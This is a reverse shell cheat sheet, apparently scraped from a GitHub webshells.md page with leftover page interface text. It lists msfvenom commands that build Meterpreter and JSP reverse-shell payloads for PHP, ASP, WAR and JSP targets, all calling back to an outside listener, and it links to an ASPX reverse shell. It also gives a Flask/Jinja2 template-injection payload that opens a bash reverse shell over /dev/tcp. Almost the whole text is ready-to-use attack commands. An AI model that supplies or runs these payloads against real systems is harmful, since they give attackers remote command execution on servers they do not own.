Reverse Shell Cheat Sheet

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.php

ASP/ASPX

https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f asp > shell.asp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f war > shell.war

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.jsp

Flask/python SSTI

// https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee
{{ ''.__class__.__mro__[1].__subclasses__()[407]('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.74/4757 0>&1"',shell=True,stdout=-1).communicate() }}

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

webshells.md

webshells.md

Reverse Shell Cheat Sheet

PHP

ASP/ASPX

WAR

JSP

Flask/python SSTI

Files

webshells.md

Latest commit

History

webshells.md

File metadata and controls

Reverse Shell Cheat Sheet

PHP

ASP/ASPX

WAR

JSP

Flask/python SSTI